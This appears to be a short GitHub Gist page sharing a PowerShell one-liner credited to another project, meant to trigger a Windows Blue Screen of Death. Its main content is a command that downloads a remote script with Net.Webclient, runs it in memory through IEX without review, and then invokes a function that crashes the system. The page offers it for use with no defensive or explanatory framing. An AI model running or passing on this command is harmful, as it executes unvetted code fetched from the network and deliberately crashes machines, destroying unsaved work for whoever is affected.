Created
April 8, 2018 20:44
-
-
Save JonnyBanana/656339a0495c3fb195a93a20b090eb77 to your computer and use it in GitHub Desktop.
invoke BSOD "the Blue Screen of Death" from Windows PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
*NOTE - invoke BSOD "the Blue Screen of Death" i have take this script from here: https://github.com/peewpw/Invoke-BSOD* | |
PS>IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment